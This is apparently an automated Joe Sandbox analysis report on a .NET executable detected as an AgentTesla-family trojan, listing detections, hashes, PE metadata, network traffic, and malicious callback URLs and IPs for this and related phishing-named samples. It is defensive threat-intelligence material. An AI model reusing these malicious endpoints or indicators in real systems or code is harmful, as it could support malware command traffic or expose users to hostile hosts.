            EH5ro3Hyug.exe29%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            6.2.EH5ro3Hyug.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.fontbureau.comF0%URL Reputationsafe
            http://www.rspb.org.uk/wildlife/birdguide/name/0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.sherwoodmastiff.com/hht8/?V2=UdJvmcuMRIp/sNw0TNsoQAu26okuAPtZrfHvhR73KElz+11bxdQbtsNL5cLMDPcOzFi3&5j=SVeDzJKXh0%Avira URL Cloudsafe
            http://www.fontbureau.comma0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            www.eastwestasia-thailand.com/hht8/0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            sherwoodmastiff.com
            		160.153.136.3
            		truetrue
              		unknown
              www.sherwoodmastiff.com
              		unknown
              		unknowntrue
                		unknown
                www.kingtreemusic.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.sherwoodmastiff.com/hht8/?V2=UdJvmcuMRIp/sNw0TNsoQAu26okuAPtZrfHvhR73KElz+11bxdQbtsNL5cLMDPcOzFi3&5j=SVeDzJKXhtrue
                  • Avira URL Cloud: safe
                  		unknown
                  www.eastwestasia-thailand.com/hht8/true
                  • Avira URL Cloud: safe
                  		low

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.apache.org/licenses/LICENSE-2.0EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.comEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designersGEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.comFEH5ro3Hyug.exe, 00000000.00000002.689041915.00000000012F7000.00000004.00000040.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.rspb.org.uk/wildlife/birdguide/name/EH5ro3Hyug.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designers/?EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bTheEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers?EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.commaEH5ro3Hyug.exe, 00000000.00000002.689041915.00000000012F7000.00000004.00000040.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.tiro.comEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                              		high
                              http://www.goodfont.co.krEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comlEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/cTheEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-user.htmlEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.jiyu-kobo.co.jp/EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleaseEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers8EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.fonts.comEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.deDPleaseEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.zhongyicts.com.cnEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sakkal.comEH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      160.153.136.3
                                      		sherwoodmastiff.comUnited States
                                      		21501GODADDY-AMSDEtrue

                                      General Information

                                      Joe Sandbox Version:33.0.0 White Diamond
                                      Analysis ID:491359
                                      Start date:27.09.2021
                                      Start time:14:06:45
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 11m 43s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:EH5ro3Hyug (renamed file extension from none to exe)
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:21
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@10/1@2/1
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 15% (good quality ratio 13.6%)
                                      • Quality average: 73.3%
                                      • Quality standard deviation: 31.4%
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                      • Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.82.210.154, 20.54.110.249, 23.0.174.200, 23.0.174.185, 40.112.88.60, 23.10.249.26, 23.10.249.43, 20.82.209.183
                                      • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      14:07:50API Interceptor1x Sleep call for process: EH5ro3Hyug.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      160.153.136.3HSBC94302,pdf.exeGet hashmaliciousBrowse
                                      • www.bowersllc.com/dhua/?dXj87bfP=DZJno2lRgPkpRcdocWJrBMQZQjsJd79nG0M0QfwGCvK21BDxR+MasdVU7jGMzvw95wLv&xXE=6lxdAHgP
                                      EWVNnyXoRS.exeGet hashmaliciousBrowse
                                      • www.freshstartdaycarecenterinc.com/9gdg/?f2JXBT=1v3lpIjBMJCYkWxoO9X4xNLGQeZZzV6uKpc2hvA5k3bzcKM1I1sCAvVyxTYVjtF2eHPY&axoHc=0DKH6PKhnz
                                      h0nSzCFt9G.exeGet hashmaliciousBrowse
                                      • www.theklownz.com/n092/?Tprx=X2JtatpP&nDKxbVC=xZ6zTG1wCRdW0FqK4OgDrOSOP6aEPheXUTUGB1IE7px35dVeIs23Fr9+4uCU9GYqzXnjYpRUWg==
                                      Noua comanda de achizitie.exeGet hashmaliciousBrowse
                                      • www.mysekrit.com/bc3s/?aJEPmr=DJBLJBWp7PolwH&c67H=E5WphFATnbnaRyuRPAh/WM7mxWtd+hXJM8jzg0hRzLi18WQzRQA1DtRaKp9ybJtfHuLm
                                      1gKjQPdvon.exeGet hashmaliciousBrowse
                                      • www.glassicsrentals.com/m8g0/?SHi8X8e=kIFpnZs5z0+/nBdZobov2JWoYGnsZajPGBKYo9xNlu1rTqVgFGN8GSwN3myxq3kKTQHE&eBZT=4hu4ZpopK40tQtZ
                                      ryfAIJHmKETyAPz.exeGet hashmaliciousBrowse
                                      • www.elenabub.com/p90g/?EPlpdD=uE62JYvV/5U2/fRWjwpnPJKU4slz1TWRV2Vk0lZZok+3XHkdz6W6i967c7YQi5hog0Im&BVqH=e2J4M8j0PxD8N
                                      NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeGet hashmaliciousBrowse
                                      • www.everythingswallow.com/kbl2/?X8sl8h70=Uk/4fiNFIrAENImNkq5NhDo1aeiSVlAy2lomCsVKXqRgqDXOUaCk1Fhsw/s2uep8GWm3&t48xlt=YTUh7PIXtPD8u2
                                      3RBawvxxeY.exeGet hashmaliciousBrowse
                                      • www.theuptownstudios.info/9t6k/?4hSpe=TAUv81DSxy6V0s2DjsmVmlW9dThxq9Qh3VfSYdLZXbEdBy5GfI0S0MTO7hpfTQbXNA8O7IBSiw==&vR-=9r04i4FhmzChinQP
                                      QUOTATION.exeGet hashmaliciousBrowse
                                      • www.cash4homesutah.com/m4ts/?KHDXBF=Rm3izdospj+ubKB1yr5SLsgzRwjgsOIy5NO+YIygSe5cIeRyIzQwpySVQfBc/5LYjUag&tR-DU=ETYX
                                      Wire Payment Instruction Copy.exeGet hashmaliciousBrowse
                                      • www.inspirestudiopro.com/i6sj/?uXcXQBqH=t94SsO8+42teq3sPOf9U6i98tzsKIq7U/jnQ7PxqyfWoFehf0hfwbKSeXhGkM6wYPtS6&lJE=FtxTAri
                                      PO9887655.exeGet hashmaliciousBrowse
                                      • www.urbanbrewlabs.com/b4nj/?cN6l=OTytRx&8pvtZZdH=c/k3B/qQLoWLUtYfSPtZzw/khWdVw3wR4gj5VtwnNNWeNzkUnQiITB7HG61rruTH1UQr
                                      CAGE8UjZmt.exeGet hashmaliciousBrowse
                                      • www.communityalliances.info/sqwo/?BTcPlT=x54d9I74DaJAzviN+MS1pXoHUOdqhv+JR+CMH1qSiS+1nVekSYfxY910zMpU1pmlAJ3l/q09+w==&Lhh8C=k6AlV0GXb27dex6P
                                      Remmittance Advise.exeGet hashmaliciousBrowse
                                      • www.therainbowmixpodcast.com/bqt25/?W6AlNtFX=/xKfFjhN+eyAVC6Cv1YZzoYouCAFleQi0yIHJdsCK3Y4L+/h2gPFpir6/wIzmD6ygeO8&3flpd=02MtKD
                                      gBMggUztPR.exeGet hashmaliciousBrowse
                                      • www.incrementumgroup.net/r48a/?SBC=kgPRCp7FmQ1qwWhzLbVAL/f7zP1ea2V3mquIzjYnI+EbjRJ+tMFg9KWn0p67f8gCzaX/&t6ALcX=-ZWd9lh
                                      Arrival Notice.exeGet hashmaliciousBrowse
                                      • www.trinitydevelopmentalcenter.com/ez2z/?5jol=fae+nqjkhrGHKaYu76qMZLgdHLYZuj/Lwm0k8H3w4k3+ncw63blTPeHnDJhmTCDQCDjeRLnTew==&YL0xrT=s8XX2FyPDZHtkN7
                                      REQUEST FOR QUOTATION.xlsxGet hashmaliciousBrowse
                                      • www.travelscappadocia.com/att3/?xfL0sV=XrhpH4yhFbv&btxhA=+5e0lDgZQLIqG33OgwJ5eoDVaUzG8FsHDr0RYq+9Lz8oFts6A/WK7VPjrJB5GIMdGrEi/g==
                                      yioor3yi8n.exeGet hashmaliciousBrowse
                                      • www.narrowpathwc.com/n8ba/?qj=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8FObh2ftta&UR-=0xo0sHb06TyDihHP
                                      b123456.exeGet hashmaliciousBrowse
                                      • www.filigreefilly.com/lt0h/?bPyXK=opnRKy5/zw2X/Pt/cp5raUaYUp/6F7xuOQIFNBYlrKALcWEu8e763T/HRu+eZeWA7ApY&6luD_=EBZlQlwxEd8T
                                      Pending DHL Shipment Notification REF 82621.exeGet hashmaliciousBrowse
                                      • www.upstaff.info/ssee/?1b_l=4ho4nNKX7&vZAd4=pl6vF5RSB6Zko6xDNSoMUKF8L1+fNrh6HiwbFcH81l+QKpdcXo1xe9+iG1J+/pT7YSi+VPJCUw==
                                      BIN.exeGet hashmaliciousBrowse
                                      • www.narrowpathwc.com/n8ba/?I6El7rEX=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8FObh2ftta&yBZ02=2df8xb-H6hatkZkp

                                      Domains

                                      No context

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      GODADDY-AMSDEHSBC94302,pdf.exeGet hashmaliciousBrowse
                                      • 160.153.136.3
                                      EWVNnyXoRS.exeGet hashmaliciousBrowse
                                      • 160.153.136.3
                                      h0nSzCFt9G.exeGet hashmaliciousBrowse
                                      • 160.153.136.3
                                      Noua comanda de achizitie.exeGet hashmaliciousBrowse
                                      • 160.153.136.3
                                      1gKjQPdvon.exeGet hashmaliciousBrowse
                                      • 160.153.136.3
                                      ryfAIJHmKETyAPz.exeGet hashmaliciousBrowse
                                      • 160.153.136.3
                                      NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeGet hashmaliciousBrowse
                                      • 160.153.136.3
                                      setup_x86_x64_install.exeGet hashmaliciousBrowse
                                      • 160.153.249.159
                                      sora.armGet hashmaliciousBrowse
                                      • 160.153.212.153
                                      WIRE TRANSFER FOR $255,114.77 THROUGH OUR ACCOUNT OFFICER.exeGet hashmaliciousBrowse
                                      • 160.153.129.29
                                      3RBawvxxeY.exeGet hashmaliciousBrowse
                                      • 160.153.136.3
                                      qB6P2WfUjb.exeGet hashmaliciousBrowse
                                      • 160.153.249.159
                                      8ft2Xvqgx2.exeGet hashmaliciousBrowse
                                      • 160.153.249.159
                                      QUOTATION.exeGet hashmaliciousBrowse
                                      • 160.153.136.3
                                      Wire Payment Instruction Copy.exeGet hashmaliciousBrowse
                                      • 160.153.136.3
                                      WJRyvbvOD7.exeGet hashmaliciousBrowse
                                      • 160.153.249.159
                                      o06RIULPrN.exeGet hashmaliciousBrowse
                                      • 160.153.249.159
                                      wpljwjYfor.exeGet hashmaliciousBrowse
                                      • 160.153.249.159
                                      ebBm41wULr.exeGet hashmaliciousBrowse
                                      • 160.153.249.159
                                      PO9887655.exeGet hashmaliciousBrowse
                                      • 160.153.136.3

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EH5ro3Hyug.exe.log
                                      Process:C:\Users\user\Desktop\EH5ro3Hyug.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1309
                                      Entropy (8bit):5.3528008810928345
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84aE4Ks:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzg
                                      MD5:542338C5A30B02E372089FECDC54D607
                                      SHA1:6FAD29FF14686FC847B160E876C1E078333F6DCB
                                      SHA-256:6CEA4E70947B962733754346CE49553BE3FB6E1FB3949C29EC22FA9CA4B7E7B6
                                      SHA-512:FE4431305A8958C4940EB4AC65723A38DA6057C3D30F789C6EDDEBA8962B62E9C0583254E74740855027CF3AE9315E3001A7EEB54168073ED0D2AB9B1F05503A
                                      Malicious:true
                                      Reputation:moderate, very likely benign file
                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):6.790198320706062
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:EH5ro3Hyug.exe
                                      File size:860672
                                      MD5:dff3bf025dcd487a2f0fb22b4ccf8998
                                      SHA1:1ff59c9410fb281ffc8d2c3c1fc3268eacd5dba1
                                      SHA256:230b56b1d072725eff3a0e100515ba924377c9f0a79308bbfa3123269ee23d56
                                      SHA512:088c3395be1bf0ef0de2135d0588c6106c5a5f279b9b40761f58298db8368a31107820dd621d66d2656b18417bf06e025a8cd3700075daeaa393ab5a62b5e899
                                      SSDEEP:12288:JIR5so4GVamo1M3de8zo70QuynMwr/amKEDm4fgGvSw24MLGhovWdo9S7LCn1tNP:3fqIFUF+W2L0YvUrzmOSha+u
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0.................. ........@.. ....................................@................................

                                      File Icon

                                      Icon Hash:138e8eccece8cccc

                                      Static PE Info

                                      General

                                      Entrypoint:0x4ba7d2
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0x61511619 [Mon Sep 27 00:53:45 2021 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:v4.0.30319
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xba7800x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x1944c.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xd60000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000xb87d80xb8800False0.678409235264data7.04755215007IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rsrc0xbc0000x1944c0x19600False0.391750692734data4.29647851076IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xd60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountry
                                      RT_ICON0xbc1800x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                      RT_ICON0xcc9b80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                      RT_ICON0xd0bf00x25a8data
                                      RT_ICON0xd31a80x10a8data
                                      RT_ICON0xd42600x468GLS_BINARY_LSB_FIRST
                                      RT_GROUP_ICON0xd46d80x4cdata
                                      RT_VERSION0xd47340x354data
                                      RT_MANIFEST0xd4a980x9b0XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Version Infos

                                      DescriptionData
                                      Translation0x0000 0x04b0
                                      LegalCopyrightCopyright F@Soft
                                      Assembly Version1.0.6.2
                                      InternalNameEventManifestOptio.exe
                                      FileVersion1.0.6.0
                                      CompanyNameF@Soft
                                      LegalTrademarks
                                      Comments
                                      ProductNameDarwin AW
                                      ProductVersion1.0.6.0
                                      FileDescriptionDarwin AW
                                      OriginalFilenameEventManifestOptio.exe

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 27, 2021 14:09:05.851680040 CEST4981680192.168.2.4160.153.136.3
                                      Sep 27, 2021 14:09:05.875760078 CEST8049816160.153.136.3192.168.2.4
                                      Sep 27, 2021 14:09:05.875880003 CEST4981680192.168.2.4160.153.136.3
                                      Sep 27, 2021 14:09:05.876187086 CEST4981680192.168.2.4160.153.136.3
                                      Sep 27, 2021 14:09:05.902435064 CEST8049816160.153.136.3192.168.2.4
                                      Sep 27, 2021 14:09:05.902458906 CEST8049816160.153.136.3192.168.2.4
                                      Sep 27, 2021 14:09:05.902467966 CEST8049816160.153.136.3192.168.2.4
                                      Sep 27, 2021 14:09:05.902844906 CEST4981680192.168.2.4160.153.136.3
                                      Sep 27, 2021 14:09:05.903044939 CEST4981680192.168.2.4160.153.136.3
                                      Sep 27, 2021 14:09:05.928517103 CEST8049816160.153.136.3192.168.2.4

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 27, 2021 14:07:36.096740007 CEST4925753192.168.2.48.8.8.8
                                      Sep 27, 2021 14:07:36.116242886 CEST53492578.8.8.8192.168.2.4
